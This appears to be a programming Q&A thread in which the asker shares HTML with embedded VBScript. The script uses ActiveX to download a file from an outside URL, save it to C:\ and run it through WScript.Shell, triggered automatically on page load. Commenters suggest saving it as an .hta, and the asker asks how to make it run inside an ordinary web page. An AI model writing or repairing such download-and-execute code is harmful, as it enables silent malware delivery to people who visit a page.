# ActiveX: Download file and execute

Tags: html, vbscript

Based in [***this question***](https://stackoverflow.com/questions/14044561/is-it-possible-to-run-the-vbscript-file-vbs-from-the-browser) i'm wanting download a file from internet and execute this file after download.

have this code below, but nothing happens. Why?

Someone also already had this trouble?

PS: I'm using *IE 11*

```
<HTML>
<HEAD>
<script type="text/vbscript" language=vbscript>
  sub test
    strFileURL = "http://www.therealbest.com/files/rosa.jpg"
    strHDLocation = "C:\shutterstock_242521867.jpg"

    Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")

    objXMLHTTP.open "GET", strFileURL, false
    objXMLHTTP.send()

    If objXMLHTTP.Status = 200 Then
      Set objADOStream = CreateObject("ADODB.Stream")
      objADOStream.Open
      objADOStream.Type = 1 

      objADOStream.Write objXMLHTTP.ResponseBody
      objADOStream.Position = 0    

      Set objFSO = Createobject("Scripting.FileSystemObject")
        If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
      Set objFSO = Nothing

      objADOStream.SaveToFile strHDLocation
      objADOStream.Close
      Set objADOStream = Nothing
    End if

    Set objXMLHTTP = Nothing

     Set WshShell = CreateObject("WScript.Shell") 
     WshShell.Run strHDLocation
     Set WshShell = Nothing
  end sub
</script>
</HEAD>
<BODY OnLoad="vbscript:test">
  these are the instructions
  <button onclick="vbscript:test" >Run the script</button> 

</BODY>
</HTML>
```

Thank you by any help.

Comment: Have you saved the file as `.hta`?

Comment: @MCND, as .hta worked. But he stay seem like a binary file. How put it inside of html, and run inside of html similar to Java applet?

Comment: Sorry, I don't understand what do you mean with *"it stays like a binary file"*.